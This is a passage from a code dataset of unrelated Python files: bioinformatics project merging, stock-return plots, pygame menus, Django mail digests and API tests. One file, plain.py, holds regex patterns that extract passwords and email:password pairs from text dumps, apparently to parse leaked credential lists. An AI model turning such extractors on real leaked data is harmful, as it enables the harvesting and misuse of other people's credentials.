new_sample.sample_info['description'] = new_sample.name\n else:\n pass # no duplicated sample names\n\n # Creating final dir and and symlinking subdirs\n super_project.final_dir = super_project.set_final_dir(merged_bcbio_cnf, super_project.dir, create_dir=True)\n for bcbio_proj in bcbio_projects:\n for old_sample, new_sample in zip(bcbio_proj.samples, new_samples_by_project[bcbio_proj]):\n # expanding relative paths\n for k, v in new_sample.sample_info['algorithm'].items():\n if isinstance(v, six.string_types) and not isfile(v):\n full_path = abspath(join(bcbio_proj.work_dir, '..', v))\n if isfile(full_path):\n new_sample.sample_info['algorithm'][k] = full_path\n merged_bcbio_cnf['details'].append(new_sample.sample_info)\n new_sample.dirpath = join(super_project.final_dir, new_sample.name)\n safe_mkdir(new_sample.dirpath)\n\n for file_or_dir in os.listdir(old_sample.dirpath):\n if file_or_dir not in [BcbioProject.ngs_report_dir, # skipping clinical reports and filtered variants\n BcbioProject.varfilter_dir,\n BcbioProject.cnv_dir]:\n safe_symlink_to(join(old_sample.dirpath, file_or_dir), new_sample.dirpath)\n\n # Ignoring CNV calls because in combine project we rerun cohort calling all samples together\n old_cnv_dir = join(old_sample.dirpath, 'cnv')\n if isdir(old_cnv_dir):\n new_cnv_dir = join(new_sample.dirpath, 'cnv')\n safe_mkdir(new_cnv_dir)\n for file_or_dir in os.listdir(new_cnv_dir):\n if not file_or_dir.endswith('-' + BcbioProject.seq2c_fname):\n safe_symlink_to(join(old_cnv_dir, file_or_dir), new_cnv_dir)\n\n # Write merged yaml\n super_project.set_project_level_dirs(merged_bcbio_cnf, project_name=project_name, create_dirs=True)\n set_up_log(super_project.log_dir, 'postproc.log')\n\n with open(join(super_project.config_dir, 'bcbio.yaml'), 'w') as yaml_file:\n yaml_file.write(save_yaml(merged_bcbio_cnf))\n\n # Saving programs and versions\n if bcbio_projects:\n bcbio_proj = bcbio_projects[0] # todo: verify that programs and versions identical for all projects\n source_dir = bcbio_proj.log_dir if isdir(bcbio_proj.log_dir) else bcbio_proj.date_dir\n for fname in os.listdir(source_dir):\n if fname in ['programs.txt', 'data_versions.csv']:\n safe_mkdir(super_project.log_dir)\n shutil.copyfile(join(source_dir, fname), join(super_project.log_dir, fname))\n\n # Merging MulitQC lists\n comb_multiqc_dir = safe_mkdir(join(super_project.log_dir, 'multiqc_bcbio'))\n combined_multiqc_file = join(comb_multiqc_dir, 'list_files_final.txt')\n with open(combined_multiqc_file, 'w') as out:\n for proj in bcbio_projects:\n with open(find_multiqc_file_list(proj)) as list_f:\n for l in list_f:\n l = l.strip()\n if not isfile(l):\n l = join(proj.final_dir, l)\n if isfile(l):\n out.write(l + '\\n')\n\n # Symlink unfiltered vcfs\n for proj in bcbio_projects:\n if not proj.is_rnaseq and verify_dir(proj.raw_var_dir, silent=True):\n safe_mkdir(super_project.raw_var_dir)\n for fname in os.listdir(proj.raw_var_dir):\n safe_symlink_to(join(proj.raw_var_dir, fname), super_project.raw_var_dir)\n\n super_project.set_samples(merged_bcbio_cnf)\n\n return super_project\n","sub_path":"ngs_reporting/bcbio/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"560922819","text":"# If you want cheack only one number is perfect or not\nx = int(input(\"Enter number\"))\nsum1 = 0\nfor i in range(1,x):\n\tif x % i == 0:\n\t\tprint(i)\n\t\tsum1=sum1+i\n\nif sum1 == x:\n\tprint(x,\"perfect number hai\")\n\n# If you want to cheak multiple number is perfect number is or not.\nx = int(input(\"Enter number\"))\nfor i in range(1,x):\n\tsum2 = 0\n\tfor j in range(1,i):\n\t\tif i % j == 0:\n\t\t\tsum2 = sum2 + j\n\tif sum2 == i:\n\t\tprint(i,\"Is Perfect Number\")\n","sub_path":"basic_coding/Day1/perfect_number.py","file_name":"perfect_number.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"612454351","text":"__author__ = 'Davide Tampellini'\n__copyright__ = '2015 Davide Tampellini - FabbricaBinaria'\n__license__ = 'GNU GPL version 3 or later'\n\nimport re\nfrom lib.extractor.abstract import AbstractExtractor\n\n\nclass PlainExtractor(AbstractExtractor):\n def __init__(self):\n super(PlainExtractor, self).__init__()\n\n # URL with passwords\n self.regex['urlPwd'] = re.compile(r'[ht|f]tp[s]*://\\w+:(.*)@\\w*\\.\\w*/')\n # Extracts data displayed in columns: Davison \tYvonne \tlibrary\n self.regex['columns'] = re.compile(r'^[a-z0-9\\-\\._]+@[a-z0-9\\-\\.]+\\.[a-z]{2,4}\\s?\\t.*?\\t.*?\\t(.*?)$', re.I | re.M)\n # Standalone passwords\n self.regex['standalone'] = re.compile(r'pass(?:word)?\\s*?[:|=](.*?$)', re.I | re.M)\n # email - password\n self.regex['emailPwd'] = re.compile(r'^\"?[a-z0-9\\-\\._]+@[a-z0-9\\-\\.]+\\.[a-z]{2,4}\\s?[/|;|:|\\||,|\\t]\\s?(.*?)[,:\\n\"]', re.I | re.M)\n # password email\n self.regex['pwdEmail'] = re.compile(r'^(?!email)(?:.*?:)?(.*?)[\\s|/|;|:|\\||,|\\t][a-z0-9\\-\\._]+@[a-z0-9\\-\\.]+\\.[a-z]{2,4}\\s*?$', re.I | re.M)\n # username - password\n self.regex['md5'] = re.compile(r'^(?!http)[a-z0-9\\-]{5,15}:(.*?)$', re.I | re.M)\n\n # Skip regexes\n # Email address\n self.regex['email'] = re.compile(r'[a-z0-9\\-\\._]+@[a-z0-9\\-\\.]+\\.[a-z]{2,4}', re.I)\n # Digits only\n self.regex['digits'] = re.compile(r'^\\d+$')\n\n def analyze(self):\n data = ''\n\n for key, regex in self.regex.iteritems():\n data += self.extractdata(regex) + '\\n'\n\n self.extracted = data\n\n def replacemateches(self, match):\n # Let's perform some sanity checks on the matched string\n try:\n skip = False\n string = match.group(1)\n string = string.strip(' \\t\\n\\r')\n\n # Is it too long or too short?\n if len(string) > 20 or len(string) < 4:\n skip = True\n\n # Does it contain some wrong character?\n if not skip:\n chars = [' ', \"\\t\", \"\\n\"]\n\n for char in chars:\n if char in string:\n skip = True\n break\n\n # Is it an email address?\n if not skip:\n if re.match(self.regex['email'], string):\n skip = True\n\n # Is this a numbers only password?\n if not skip:\n if re.match(self.regex['digits'], string):\n skip = True\n\n # If the skip flag is not set, let's add the string to the matches\n if not skip:\n self.matches.append(string)\n\n except IndexError:\n # Do nothing, there is no match\n pass\n\n return ''\n","sub_path":"src/lib/extractor/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"291430952","text":"\"\"\"\nCreated on Wed Feb 21 10:37:33 2018\n\n@author: William Holtam\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport pylab as plt\nfrom scipy.stats import norm, probplot\nfrom matplotlib.ticker import FuncFormatter\n\nheaders = ['Date', 'Open', 'High', 'Low', 'Close', 'Adj Close', 'Volume']\ndtypes = {'Date': 'str', 'Open': 'float', 'High': 'float', 'Low': 'float', 'Close': 'float', 'Adj Close': 'float', 'Volume': 'int'}\nparse_dates = ['Date']\ndf = pd.read_csv('DNL.L.csv', \n delimiter=',', \n header=0,\n index_col=None,\n dtype=dtypes, \n parse_dates=parse_dates)\nprint(df.info())\nadj_close = df.loc[:,\"Adj Close\"]\nadj_close = adj_close.values.tolist()\n\ndaily_returns=[0]\nfor i in np.arange(1,len(adj_close)-1):\n returns = (adj_close[i]-adj_close[i-1])/adj_close[i-1]\n daily_returns.append(returns)\nplt.hist(adj_close, bins=30)\nplt.show()\n\nmu, std = norm.fit(daily_returns)\n\nprint(norm.fit(daily_returns))\nprint(mu)\nfig, axes = plt.subplots(ncols=1, sharey=True)\nfig = plt.hist(daily_returns, bins=100, density=True)\naxes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\nxmin,xmax = plt.xlim()\nplt.xlim(xmin,xmax)\nx = np.linspace(xmin,xmax,100)\np = norm.pdf(x,mu,std)\nplt.plot(x,p,'k',linewidth=2)\ntitle = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\nplt.title(title)\nplt.show()\n\nprobplot(daily_returns, plot=plt)\nplt.xlim(-4,4)\nplt.ylim(-0.3,0.15)\nplt.show()\n\nfive_day_returns = [0]\nfor i in np.arange(4,len(adj_close)-1,5):\n returns = (adj_close[i]-adj_close[i-1]) / adj_close[i-1]\n five_day_returns.append(returns)\n \nfig, axes = plt.subplots(ncols=1, sharey=True)\nfig = plt.hist(five_day_returns, bins=100, density=True)\naxes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\nxmin,xmax = plt.xlim()\nplt.xlim(xmin,xmax)\nx = np.linspace(xmin,xmax,100)\np = norm.pdf(x,mu,std)\nplt.plot(x,p,'k',linewidth=2)\ntitle = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\nplt.title(title)\nplt.show()\n\nprobplot(five_day_returns, plot=plt)\nplt.xlim(-4,4)\nplt.ylim(-0.3,0.15)\nplt.show()\n\nten_day_returns = [0]\nfor i in np.arange(9,len(adj_close)-1,10):\n returns = (adj_close[i]-adj_close[i-1]) / adj_close[i-1]\n ten_day_returns.append(returns)\n \nfig, axes = plt.subplots(ncols=1, sharey=True)\nfig = plt.hist(ten_day_returns, bins=100, density=True)\naxes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\nxmin,xmax = plt.xlim()\nplt.xlim(xmin,xmax)\nx = np.linspace(xmin,xmax,100)\np = norm.pdf(x,mu,std)\nplt.plot(x,p,'k',linewidth=2)\ntitle = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\nplt.title(title)\nplt.show()\n\nprobplot(ten_day_returns, plot=plt)\nplt.xlim(-4,4)\nplt.ylim(-0.3,0.15)\nplt.show()\n\nk = 0\nnumber_of_days = [1,4,9]\nincrement = [1,5,10]\nincrement_label = [\"Daily Returns\", \"Five Day Returns\", \"Ten Day Returns\"]\nlist_label = [\"daily_returns\", \"five_day_returns\", \"ten_day_returns\"]\nfor j in list_label:\n j = [0]\n for i in np.arange(number_of_days[k],len(adj_close)-1,increment[k]):\n returns = (adj_close[i]-adj_close[i-1]) / adj_close[i-1]\n j.append(returns)\n \n mu, std = norm.fit(j)\n \n fig, axes = plt.subplots(ncols=1, sharey=True)\n fig = plt.hist(j, bins=100, density=True)\n axes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\n xmin,xmax = plt.xlim()\n plt.xlim(xmin,xmax)\n x = np.linspace(xmin,xmax,100)\n p = norm.pdf(x,mu,std)\n plt.plot(x,p,'k',linewidth=2) # This isn't correct but it's a start\n title = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\n plt.title(title)\n plt.show()\n\n probplot(j, plot=plt)\n plt.title(\"Probability Plot of \" + increment_label[k])\n plt.xlim(-4,4)\n plt.ylim(-0.3,0.15)\n plt.show()\n \n k += 1\n","sub_path":"daily-returns-analysis.py","file_name":"daily-returns-analysis.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"309192812","text":"import folium\nimport pandas as pd\n\nmymap = folium.Map([50.736455, 17.666], zoom_start=4.5)\nstations = folium.FeatureGroup(\"Stations\")\n\nmetadata = pd.read_csv(\"metadata.csv\", sep=\"\\t\")\n#metadata.dropna(inplace=True)\nmetadata.drop_duplicates([\"AirQualityStationEoICode\"], inplace=True)\nmetadata.to_csv(\"pogchamp.csv\")\n\nfor index, row in metadata.iterrows():\n stations.add_child(folium.Marker(row[[\"Latitude\", \"Longitude\"]]))\n\nmymap.add_child(stations)\nmymap.save('../maps/map1.html')\n","sub_path":"scripts/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"329263306","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n#Date:16-10-2017\n#Author:jhinno\n#Version=.3\n\n\nimport sys\nsys.path.append(\"..\")\nfrom tools.tools import *\nimport unittest\nimport main\n\n\n\nclass TestDesktopStart(unittest.TestCase):\n \"\"\"测试 appform 申请桌面 case:\"\"\"\n\n def setUp(self):\n print(\"开始测试appform申请桌面【desktopStart api】 ...\")\n \n\n def actions(self, arg1 , arg2, arg3, arg4 , arg5, arg6, arg7, arg8):\n\n self.url = arg7[0] + \"desktopStart?os=\" + arg1 + \"&appid=\" + arg2 + \"&resource=\" + arg3 + \"&protocol=\" + arg4 + \\\n \"&metircs_width=\" + arg5 + \"&metircs_height=\" + arg6 + \"&token=\" + arg7[1]\n self.result = Tools().access_web(self.url)\n self.data = \"期望值:\" + arg8 + \"\\n操作系统:\" + arg1 + \"\\n应用名称:\" + arg2 + \"\\n资源:\" + arg3 + \\\n \"\\n协议:\" + arg4 + \"\\n分辨率宽度:\" + arg5 + \"\\n分辨率高度:\" + arg6\n\n if arg8 == \"1\": \n self.assertEqual(self.result['result'], \"success\", msg = \"self.result['message']\")\n else:\n self.assertNotEqual(self.result['result'], \"success\", msg = \"self.result['message']\")\n\n\n @staticmethod\n def getTestFunc(arg1 , arg2, arg3, arg4 , arg5, arg6, arg7, arg8, arg9):\n def func(self):\n self.actions(arg1 , arg2, arg3, arg4 , arg5, arg6,arg7,arg8)\n return func\n\n def tearDown(self):\n print(\"【desktops api】 访问的URL地址为:\")\n print(self.url)\n print(\"【desktops api】 测试数据为:\")\n print(self.data)\n print(\"【desktops api】 测试返回值:\")\n print(self.result)\n print(\"【desktops api】 测试结束...\")\n\n\n\n\ndef generateTestCases(cases):\n arglists = []\n lenth = len(cases[0])\n for i in range(lenth):\n cas = cases[0][i]['name'] \n ext = str(cases[0][i]['expect'])\n osm = cases[0][i]['OS']\n apd = cases[0][i]['appid']\n rce = cases[0][i]['resource']\n ptl = cases[0][i]['protocol']\n mwh = cases[0][i]['metircs_width']\n mhg = cases[0][i]['metircs_height']\n arglists.append((osm, apd, rce, ptl, mwh, mhg, cases[1], str(ext), cas))\n\n for args in arglists:\n setattr(TestDesktopStart, 'test_desktopstart_{0}_{1}_{2}_{3}_{4}_{5}_{7}{7}_{8}'.format(\\\n args[0], args[1], args[2],args[3], args[4], args[5], args[6],args[7],args[8]), TestDesktopStart.getTestFunc(*args) )\n\n\ngenerateTestCases(main.get_test_data(type='desktopStart'))\n\n\n\nif __name__ == '__main__':\n\tunittest.main()\n\n","sub_path":"resapi Automated Testing Script/jhappform_api/test_case/test_desktopstart.py","file_name":"test_desktopstart.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"167729162","text":"from datetime import datetime, timedelta\nfrom django.utils import timezone\n\nfrom django.core.management.base import BaseCommand\nfrom django.core.mail import send_mass_mail\nfrom django.core.mail import get_connection, EmailMultiAlternatives\n\nfrom messages.models import Conversation\nfrom CoverAccounts.models import CoverMember\nfrom django.template import Context\nfrom django.template.loader import get_template\n\nclass Command(BaseCommand):\n help = 'Sends an email digest to all users with new messages.'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n\n self.stdout.write('{} - Start executing Daily Email Digest command.\\nSend emails to the following users:'.format(datetime.now(timezone.utc)))\n\n messages_to_send = []\n\n email_subject = 'CACTuS - Daily update'\n email_from = 'tutoring@svcover.nl'\n\n mail_template_plain = get_template('maildigest/daily_digest.txt')\n mail_template_html = get_template('maildigest/daily_digest.html')\n\n for user in CoverMember.objects.filter(receives_daily_mails=True, is_active=True):\n\n conversations = list(Conversation.objects.conversations_of(user))\n conversations = [c for c in conversations\n if c.latest_message()\n and not user in c.latest_message().read_by.all()\n and datetime.now(timezone.utc) - c.latest_message().sent_at\n <= timedelta(hours=24)]\n\n if len(conversations) == 0:\n continue\n\n context = {\n 'user': user,\n 'conversations': conversations,\n 'n_conversations': len(conversations),\n }\n mail_content_plain = mail_template_plain.render(context)\n mail_content_html = mail_template_html.render(context)\n\n message = EmailMultiAlternatives(email_subject, mail_content_plain, email_from, [user.email])\n message.attach_alternative(mail_content_html, 'text/html')\n\n print(' - {}'.format(user))\n messages_to_send.append(message)\n\n self.stdout.write('Talking to mail server...')\n\n with get_connection() as connection:\n connection.send_messages(messages_to_send)\n\n self.stdout.write('Done! Mails successfully sent to {n} people!\\n{t} - Done.\\n---'.\n format(n=len(messages_to_send), t=datetime.now()))\n","sub_path":"web/task/management/commands/senddailydigest.py","file_name":"senddailydigest.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"558188323","text":"# coding=utf-8\n\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nEXAMPLE - MULTI-INPUT\nShows different inputs (widgets).\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2020 Pablo Pizarro R. @ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\n# Import libraries\nimport sys\n\nsys.path.insert(0, '../../')\n\nimport os\nimport pygame\nimport pygameMenu\n\n# -----------------------------------------------------------------------------\n# Constants and global variables\n# -----------------------------------------------------------------------------\nCOLOR_BLACK = (0, 0, 0)\nCOLOR_WHITE = (255, 255, 255)\nFPS = 60.0\nMENU_BACKGROUND_COLOR = (228, 100, 36)\nTITLE_BACKGROUND_COLOR = (170, 65, 50)\nWINDOW_SIZE = (640, 480)\n\n# noinspection PyTypeChecker\nsound = None # type: pygameMenu.sound.Sound\n\n# noinspection PyTypeChecker\nsurface = None # type: pygame.Surface\n\n# noinspection PyTypeChecker\nmain_menu = None # type: pygameMenu.Menu\n\n\n# -----------------------------------------------------------------------------\n# Methods\n# -----------------------------------------------------------------------------\ndef main_background():\n \"\"\"\n Background color of the main menu, on this function user can plot\n images, play sounds, etc.\n\n :return: None\n \"\"\"\n global surface\n surface.fill((40, 40, 40))\n\n\ndef check_name_test(value):\n \"\"\"\n This function tests the text input widget.\n\n :param value: The widget value\n :type value: basestring\n :return: None\n \"\"\"\n print('User name: {0}'.format(value))\n\n\n# noinspection PyUnusedLocal\ndef update_menu_sound(value, enabled):\n \"\"\"\n Update menu sound.\n\n :param value: Value of the selector (Label and index)\n :type value: tuple\n :param enabled: Parameter of the selector, (True/False)\n :type enabled: bool\n :return: None\n \"\"\"\n global main_menu\n global sound\n if enabled:\n main_menu.set_sound(sound, recursive=True)\n print('Menu sounds were enabled')\n else:\n main_menu.set_sound(None, recursive=True)\n print('Menu sounds were disabled')\n\n\ndef main(test=False):\n \"\"\"\n Main program.\n\n :param test: Indicate function is being tested\n :type test: bool\n :return: None\n \"\"\"\n\n # -------------------------------------------------------------------------\n # Globals\n # -------------------------------------------------------------------------\n global main_menu\n global sound\n global surface\n\n # -------------------------------------------------------------------------\n # Init pygame\n # -------------------------------------------------------------------------\n pygame.init()\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n\n # Create pygame screen and objects\n surface = pygame.display.set_mode(WINDOW_SIZE)\n pygame.display.set_caption('Example - Multi Input')\n clock = pygame.time.Clock()\n\n # -------------------------------------------------------------------------\n # Set sounds\n # -------------------------------------------------------------------------\n sound = pygameMenu.sound.Sound()\n\n # Load example sounds\n sound.load_example_sounds()\n\n # Disable a sound\n sound.set_sound(pygameMenu.sound.SOUND_TYPE_ERROR, None)\n\n # -------------------------------------------------------------------------\n # Create menus: Settings\n # -------------------------------------------------------------------------\n settings_menu = pygameMenu.Menu(font=pygameMenu.font.FONT_HELVETICA,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.85,\n menu_width=WINDOW_SIZE[0] * 0.9,\n onclose=pygameMenu.events.DISABLE_CLOSE,\n title='Settings',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_alignment=pygameMenu.locals.ALIGN_LEFT,\n widget_font_color=COLOR_BLACK,\n widget_font_size=25,\n widget_margin_x=10,\n )\n\n # Add text inputs with different configurations\n wid1 = settings_menu.add_text_input('First name: ',\n default='John',\n onreturn=check_name_test,\n textinput_id='first_name')\n wid2 = settings_menu.add_text_input('Last name: ',\n default='Rambo',\n maxchar=10,\n textinput_id='last_name',\n input_underline='.')\n settings_menu.add_text_input('Your age: ',\n default=25,\n maxchar=3,\n maxwidth=3,\n textinput_id='age',\n input_type=pygameMenu.locals.INPUT_INT,\n enable_selection=False)\n settings_menu.add_text_input('Some long text: ',\n maxwidth=19,\n textinput_id='long_text',\n input_underline='_')\n settings_menu.add_text_input('Password: ',\n maxchar=6,\n password=True,\n textinput_id='pass',\n input_underline='_')\n\n # Create selector with 3 difficulty options\n settings_menu.add_selector('Select difficulty ',\n [('Easy', 'EASY'),\n ('Medium', 'MEDIUM'),\n ('Hard', 'HARD')],\n selector_id='difficulty',\n default=1)\n\n def data_fun():\n \"\"\"\n Print data of the menu.\n\n :return: None\n \"\"\"\n print('Settings data:')\n data = settings_menu.get_input_data()\n for k in data.keys():\n print(u'\\t{0}\\t=>\\t{1}'.format(k, data[k]))\n\n settings_menu.add_button('Store data', data_fun) # Call function\n settings_menu.add_button('Return to main menu', pygameMenu.events.BACK,\n align=pygameMenu.locals.ALIGN_CENTER)\n settings_menu.center_content() # After all widgets added\n\n # -------------------------------------------------------------------------\n # Create menus: More settings\n # -------------------------------------------------------------------------\n more_settings_menu = pygameMenu.Menu(font=pygameMenu.font.FONT_COMIC_NEUE,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.85,\n menu_width=WINDOW_SIZE[0] * 0.9,\n onclose=pygameMenu.events.DISABLE_CLOSE,\n selection_color=COLOR_WHITE,\n title='More Settings',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_alignment=pygameMenu.locals.ALIGN_LEFT,\n widget_font_color=COLOR_BLACK,\n widget_font_size=25,\n widget_offset_x=5, # px\n widget_offset_y=10, # px\n )\n\n more_settings_menu.add_image(pygameMenu.baseimage.IMAGE_PYGAME_MENU,\n scale=(0.25, 0.25),\n align=pygameMenu.locals.ALIGN_CENTER)\n more_settings_menu.add_color_input('Color 1 RGB: ', color_type='rgb')\n more_settings_menu.add_color_input('Color 2 RGB: ', color_type='rgb', default=(255, 0, 0), input_separator='-')\n\n def print_color(color):\n \"\"\"\n Test onchange/onreturn.\n\n :param color: Color tuple\n :type color: tuple\n :return: None\n \"\"\"\n print('Returned color: ', color)\n\n more_settings_menu.add_color_input('Color in Hex: ', color_type='hex', onreturn=print_color)\n\n more_settings_menu.add_vertical_margin(25)\n more_settings_menu.add_button('Return to main menu', pygameMenu.events.BACK,\n align=pygameMenu.locals.ALIGN_CENTER)\n\n # -------------------------------------------------------------------------\n # Create menus: Column buttons\n # -------------------------------------------------------------------------\n button_column_menu = pygameMenu.Menu(columns=2,\n font=pygameMenu.font.FONT_COMIC_NEUE,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.45,\n menu_width=WINDOW_SIZE[0] * 0.9,\n onclose=pygameMenu.events.DISABLE_CLOSE,\n rows=3,\n selection_color=COLOR_WHITE,\n title='Columns',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_font_color=COLOR_BLACK,\n widget_font_size=25,\n )\n for i in range(4):\n button_column_menu.add_button('Button {0}'.format(i), pygameMenu.events.BACK)\n button_column_menu.add_button('Return to main menu', pygameMenu.events.BACK)\n button_column_menu.center_content()\n\n # -------------------------------------------------------------------------\n # Create menus: Main menu\n # -------------------------------------------------------------------------\n main_menu = pygameMenu.Menu(font=pygameMenu.font.FONT_COMIC_NEUE,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.7,\n menu_width=WINDOW_SIZE[0] * 0.8,\n onclose=pygameMenu.events.EXIT, # User press ESC button\n selection_color=COLOR_WHITE,\n title='Main menu',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_font_color=COLOR_BLACK,\n widget_font_size=30,\n widget_offset_y=0.09,\n )\n\n main_menu.add_button('Settings', settings_menu)\n main_menu.add_button('More Settings', more_settings_menu)\n main_menu.add_button('Menu in columns!', button_column_menu)\n main_menu.add_selector('Menu sounds ',\n [('Off', False), ('On', True)],\n onchange=update_menu_sound)\n main_menu.add_button('Quit', pygameMenu.events.EXIT)\n\n assert main_menu.get_widget('first_name', recursive=True) is wid1\n assert main_menu.get_widget('last_name', recursive=True) is wid2\n assert main_menu.get_widget('last_name') is None\n\n # -------------------------------------------------------------------------\n # Main loop\n # -------------------------------------------------------------------------\n while True:\n\n # Tick\n clock.tick(FPS)\n\n # Paint background\n main_background()\n\n # Main menu\n main_menu.mainloop(surface, main_background, disable_loop=test, fps_limit=FPS)\n\n # Flip surface\n pygame.display.flip()\n\n # At first loop returns\n if test:\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pygameMenu/examples/multi_input.py","file_name":"multi_input.py","file_ext":"py","file_size_in_byte":13207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"408181430","text":"import sys\r\nsys.path.insert(0,'../..')\r\nsys.path.append('..')\r\nimport autosar\r\nimport Signals\r\nimport time\r\nfrom TelltaleHandler import TelltaleHandler\r\nfrom GaugeHandler import GaugeHandler\r\n\r\nclass Application(autosar.Template):\r\n @classmethod\r\n def apply(cls, ws):\r\n if ws.find(cls.__name__) is None:\r\n package = ws.getComponentTypePackage()\r\n swc = package.createCompositionComponent(cls.__name__)\r\n cls._addTelltaleHandler(ws, swc)\r\n cls._addGaugeHandler(ws, swc)\r\n \r\n @classmethod\r\n def _addTelltaleHandler(cls, ws, swc):\r\n ws.apply(TelltaleHandler)\r\n swc.apply(Signals.ParkBrakeStatus.Receive)\r\n swc.apply(Signals.DirIndStat.Receive)\r\n swc.createComponentRef('TelltaleHandler')\r\n swc.createConnector('ParkBrakeStatus', 'TelltaleHandler/ParkBrakeStatus')\r\n swc.createConnector('DirIndStat', 'TelltaleHandler/DirIndStat')\r\n\r\n @classmethod\r\n def _addGaugeHandler(cls, ws, swc):\r\n ws.apply(GaugeHandler)\r\n swc.apply(Signals.VehicleSpeed.Receive) \r\n swc.createComponentRef('GaugeHandler')\r\n swc.createConnector('VehicleSpeed', 'GaugeHandler/VehicleSpeed')\r\n\r\nif __name__ == '__main__': \r\n ws = autosar.workspace()\r\n ws.apply(Application)\r\n swc = ws.find('Application', role='ComponentType')\r\n messages = swc.verify()\r\n #print(swc) \r\n # ignoreList = []\r\n # ignoreList.append(ws.find('TelltaleHandler', role='ComponentType'))\r\n # ignoreList.append(ws.find('GaugeHandler', role='ComponentType'))\r\n # ws.saveXML('Application.arxml', packages=['ComponentType'], ignore=[swc.ref for swc in ignoreList])\r\n","sub_path":"tutorial2/components/Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"203165688","text":"import pickle\nimport numpy as np\nimport torch\n\npickle_eng = open('pickles/eng.pickle', 'rb')\neng = pickle.load(pickle_eng)\npad_idx = eng.vocab.stoi['']\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef create_subsequent_mask(target):\n '''\n if target length is 5 and diagonal is 1, this function returns\n [[0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1],\n [0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0]]\n :param target: [batch size, target length]\n :return:\n '''\n batch_size, target_length = target.size()\n\n # torch.triu returns the upper triangular part of a matrix based on user defined diagonal\n subsequent_mask = torch.triu(torch.ones(target_length, target_length), diagonal=1).bool().to(device)\n # subsequent_mask = [target length, target length]\n\n # repeat subsequent_mask 'batch size' times to cover all data instances in the batch\n subsequent_mask = subsequent_mask.unsqueeze(0).repeat(batch_size, 1, 1)\n # subsequent_mask = [batch size, target length, target length]\n\n return subsequent_mask\n\n\ndef create_source_mask(source):\n '''\n create masking tensor for encoder's self attention\n if sentence is [2, 193, 9, 27, 10003, 1, 1, 1, 3] and 2 denotes , 3 denotes and 1 denotes \n masking tensor will be [False, False, False, False, False, True, True, True, False]\n :param source: [batch size, source length]\n :return: source mask\n '''\n source_length = source.shape[1]\n\n # create boolean tensors which will be used to mask padding tokens of both source and target sentence\n source_mask = (source == pad_idx)\n # source_mask = [batch size, source length]\n\n # repeat sentence masking tensors 'sentence length' times\n source_mask = source_mask.unsqueeze(1).repeat(1, source_length, 1)\n # source_mask = [batch 